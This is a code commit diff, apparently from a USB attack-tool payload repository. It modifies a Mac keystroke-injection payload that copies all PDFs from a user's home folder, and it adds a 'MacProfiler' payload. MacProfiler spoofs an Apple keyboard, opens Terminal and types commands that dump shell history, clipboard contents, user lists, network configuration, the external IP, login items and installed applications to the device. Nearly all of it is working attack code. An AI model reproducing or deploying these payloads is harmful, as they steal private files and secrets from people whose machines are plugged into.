Added MacProfiler payload (#195)
* clean up loot added sub folder so all files are not in root of loot folder * MacProfiler NewPayload for Profiling Mac systems * Make DIRpull/211/head
parent
a11091c5c4
commit
33d62ff9e9
|
@ -1,4 +1,4 @@
|
|||
#!/bin/bash
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: MacPDFExfil
|
||||
# Author: k1ul3ss
|
||||
|
@ -14,13 +14,15 @@ ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
|||
dev_name="BashBunny"
|
||||
|
||||
# loot directory
|
||||
lootdir="/Volumes/$dev_name/loot/"
|
||||
lootdir="/Volumes/$dev_name/loot/MacPDFExfil/"
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING mkdir -p $lootdir
|
||||
QUACK ENTER
|
||||
# Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage.
|
||||
QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
|
||||
QUACK ENTER
|
||||
|
|
|
@ -0,0 +1,52 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MacProfiler
|
||||
# Author: jdetmold
|
||||
# Version: 1.0
|
||||
#
|
||||
# Creates a basic system profile for a mac computer
|
||||
# Saves all data to loot/MacProfiler/{system name}/item.txt
|
||||
#
|
||||
# Saves the following data to individule files:
|
||||
#
|
||||
#Terminal history.
|
||||
#Current clipboard contents.
|
||||
#List of users on the system.
|
||||
#ifconfig data.
|
||||
#Systems WAN IP.
|
||||
#All login items set to start up with the system.
|
||||
#List of installed Applications from /Applications.
|
||||
#
|
||||
#
|
||||
# Blue - Running
|
||||
# Green - Finished
|
||||
#
|
||||
|
||||
LED B
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
|
||||
lootdir=/Volumes/BashBunny/loot/MacProfiler/$\(hostname\)
|
||||
|
||||
# Start Terminal
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2500
|
||||
|
||||
# Save data
|
||||
QUACK STRING mkdir -p $lootdir\; history \> $lootdir/history.txt\; osascript -e \"the clipboard\" \> $lootdir/clipboard.txt\; dscl . list /Users \| grep -v '_' \> $lootdir/users.txt\; ifconfig \> $lootdir/ifconfig.txt\; curl ipecho.net/plain \> $lootdir/ExternalIP.txt\; osascript -e \'tell application \"System Events\" to get the name of every login item\' \>$lootdir/LoginItems.txt\; ls /Applications/ \> $lootdir/Applications.txt\;
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
# Eject
|
||||
QUACK STRING diskutil eject /Volumes/BashBunny/;
|
||||
QUACK ENTER
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
|
@ -0,0 +1,30 @@
|
|||
# MacProfiler
|
||||
* Author: jdetmold
|
||||
* Version: Version 1.0
|
||||
* Target: Mac
|
||||
|
||||
## Description
|
||||
|
||||
Uses a HID/Storage Attack to create a system profile including the following information:
|
||||
Terminal history.
|
||||
Current clipboard contents.
|
||||
List of users on the system.
|
||||
ifconfig data.
|
||||
Systems WAN IP.
|
||||
All login items set to start up with the system.
|
||||
List of installed Applications from /Applications.
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Blue | Running |
|
||||
| Green | Finished |
|
||||
|
||||
|
||||
## Discussion
|
||||
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40829-payload-macprofiler/ "Hak5 Forum Thread")
|
Loading…
Reference in New Issue